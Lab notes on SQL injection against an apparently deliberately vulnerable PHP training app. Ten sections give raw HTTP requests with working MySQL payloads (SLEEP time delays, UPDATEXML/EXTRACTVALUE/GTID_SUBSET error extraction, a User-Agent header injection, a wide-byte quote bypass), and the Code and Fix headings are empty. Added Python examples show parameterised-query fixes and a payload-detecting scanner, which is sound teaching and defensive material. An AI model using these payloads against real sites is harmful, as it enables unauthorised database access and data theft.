SQL injection
1. Numeric injection
Constraints
The submit parameter must be present
Reproduction
POST /vul/sqli/sqli_id.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_id.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

id=1 AND GTID_SUBSET(CONCAT(0x7176787a71,(SELECT (ELT(7937=7937,1))),0x716b6b6271),7937)&submit=%E6%9F%A5%E8%AF%A2
Code
Fix
2. String injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_str.php?name=wwss' AND (SELECT 2605 FROM (SELECT(SLEEP(0)))FYCn)%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_str.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
Code
Fix
3. Search injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_search.php?name=1111' AND (SELECT 3758 FROM (SELECT(SLEEP(5)))DjNH)%23&submit=%E6%90%9C%E7%B4%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_search.php?name=qqq&submit=%E6%90%9C%E7%B4%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
Code
Fix
4. xx-type injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_x.php?name=aa') AND (SELECT 1122 FROM (SELECT(SLEEP(5)))Jrjn)-- dgsV&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_x.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
Code
Fix
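Added example, not the lab's code: the four SELECT contexts from sections 1 to 4, each as string concatenation beside a bound-parameter query. The query shapes are inferred from the quoting the requests break out of; the table, columns, rows and tautology inputs are constructed, and Python's sqlite3 stands in for PHP/MySQL so the block runs offline.

```python
import sqlite3

def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?)",
                   [(1, "vince"), (2, "allen"), (3, "kobe")])
    return db

# Assumed query shapes: bare number, quoted string, LIKE '%..%', and ('..').
CONCAT = {
    "numeric": "SELECT username FROM member WHERE id = {v}",
    "string": "SELECT username FROM member WHERE username = '{v}'",
    "search": "SELECT username FROM member WHERE username LIKE '%{v}%'",
    "xx": "SELECT username FROM member WHERE username = ('{v}')",
}
BOUND = {
    "numeric": "SELECT username FROM member WHERE id = ?",
    "string": "SELECT username FROM member WHERE username = ?",
    "search": "SELECT username FROM member WHERE username LIKE ? ESCAPE '\\'",
    "xx": "SELECT username FROM member WHERE username = (?)",
}

def run_concat(db, kind, value):
    """Vulnerable form: the value becomes part of the SQL text."""
    return db.execute(CONCAT[kind].format(v=value)).fetchall()

def run_bound(db, kind, value):
    """Fixed form: the SQL text is constant and the value is bound as data."""
    if kind == "numeric":
        if not (value.isascii() and value.isdigit()):
            return []          # reject anything that is not a plain integer
        value = int(value)
    elif kind == "search":
        for ch in ("\\", "%", "_"):   # escape LIKE wildcards in user input
            value = value.replace(ch, "\\" + ch)
        value = f"%{value}%"
    return db.execute(BOUND[kind], (value,)).fetchall()

# Constructed tautology inputs, one per context.
SAMPLES = {
    "numeric": "1 OR 1=1", "string": "x' OR '1'='1",
    "search": "x%' OR '1'='1' --", "xx": "x') OR ('1'='1",
}
```

In the PHP application the same fix is a prepared statement (PDO or mysqli) with the value bound rather than interpolated.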
5. insert/update injection
Constraints
The submit parameter must be present
Reproduction
POST /vul/sqli/sqli_iu/sqli_edit.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_iu/sqli_edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

sex=q' AND EXTRACTVALUE(2280,CONCAT(0x5c,0x7171786a71,(SELECT (ELT(2280=2280,1))),0x716b767671))-- E&phonenum=%27iii&add=iuuu%27and+1%3D1&email=22%40qq.com&submit=submit
Code
Fix
6. HTTP header injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: bbb.com:8882
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: '||(SELECT 0x66427650 WHERE 6659=6659 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(5655=5655,1))),0x71786b6a71),5655))||'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_header/sqli_header_login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
Code
Fix
7. Boolean-based blind injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_blind_b.php?name=kobe' AND (SELECT 4721 FROM (SELECT(SLEEP(5)))EvmL) AND 'rXhQ'='rXhQ&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_b.php?name=e&submit=%E6%9F%A5%E8%AF%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
Code
Fix
8. Time-based blind injection
Constraints
The submit parameter must be present
Reproduction
GET /vul/sqli/sqli_blind_t.php?name=yyy' AND (SELECT 3035 FROM (SELECT(SLEEP(5)))canh) AND 'dHLC'='dHLC&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_t.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
Code
Fix
9. Wide-byte injection
Constraints
The submit parameter must be present
Reproduction
POST /vul/sqli/sqli_widebyte.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 46
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_widebyte.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close

name=kobe%bf'or 1=1#&submit=%E6%9F%A5%E8%AF%A2
Code
Fix
10. delete injection
Constraints
Reproduction
GET /vul/sqli/sqli_del.php?id=1 or updatexml(1,concat(0x7e, database()),3) HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_del.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
Code
Fix
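Added example, not part of the original notes: a small Python scanner that flags the markers visible in the requests above (SLEEP, GTID_SUBSET/EXTRACTVALUE/UPDATEXML, numeric tautologies, a stray multi-byte lead byte before a quote) in query, body and header inputs. The rule labels and the watched-header set are assumptions; the three flagged samples are copied from sections 10, 6 and 9 with most headers trimmed, and the benign request is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Markers taken from the payloads in the requests above; not a complete signature set.
RULES = [
    ("time-based", re.compile(rb"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(rb"\b(gtid_subset|extractvalue|updatexml)\s*\(", re.I)),
    ("boolean", re.compile(rb"\b(or|and)\s+\d+\s*=\s*\d+", re.I)),
]
WIDE = re.compile(rb"[\x81-\xfe]['\\]")   # lead byte directly before a quote or backslash
WATCHED_HEADERS = {"user-agent", "referer", "cookie"}   # assumed set; section 6 uses User-Agent

def fields(raw):
    """Yield (location, name, value) for query, body and watched header inputs."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    target = lines[0].split(" ", 1)[1].rsplit(" ", 1)[0]   # tolerates unencoded spaces
    for loc, blob in (("query", target.partition("?")[2]), ("body", body.strip())):
        for pair in filter(None, blob.split("&")):
            name, _, value = pair.partition("=")
            yield loc, name, value
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.lower() in WATCHED_HEADERS:
            yield "header", name, value.strip()

def is_utf8(data):
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False

def scan(raw):
    """Return (location, field, label) for every marker found in one raw request."""
    hits = []
    for loc, name, value in fields(raw):
        data = unquote_to_bytes(value.replace("+", " "))
        hits += [(loc, name, label) for label, rx in RULES if rx.search(data)]
        if WIDE.search(data) and not is_utf8(data):   # valid UTF-8 text is not flagged
            hits.append((loc, name, "wide-byte"))
    return hits

# Requests from sections 10, 6 and 9 above (headers trimmed), plus one constructed benign request.
DELETE_REQ = "GET /vul/sqli/sqli_del.php?id=1 or updatexml(1,concat(0x7e, database()),3) HTTP/1.1\nHost: bbb.com:8882\n"
HEADER_REQ = "GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1\nHost: bbb.com:8882\nUser-Agent: '||(SELECT 0x66427650 WHERE 6659=6659 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(5655=5655,1))),0x71786b6a71),5655))||'Mozilla/5.0\n"
WIDE_REQ = "POST /vul/sqli/sqli_widebyte.php HTTP/1.1\nHost: bbb.com:8882\nContent-Type: application/x-www-form-urlencoded\n\nname=kobe%bf'or 1=1#&submit=%E6%9F%A5%E8%AF%A2"
BENIGN_REQ = "GET /vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1\nHost: bbb.com:8882\nUser-Agent: Mozilla/5.0\n"
```

Matches like these are triage signals for log review or a WAF rule, not a substitute for fixing the queries.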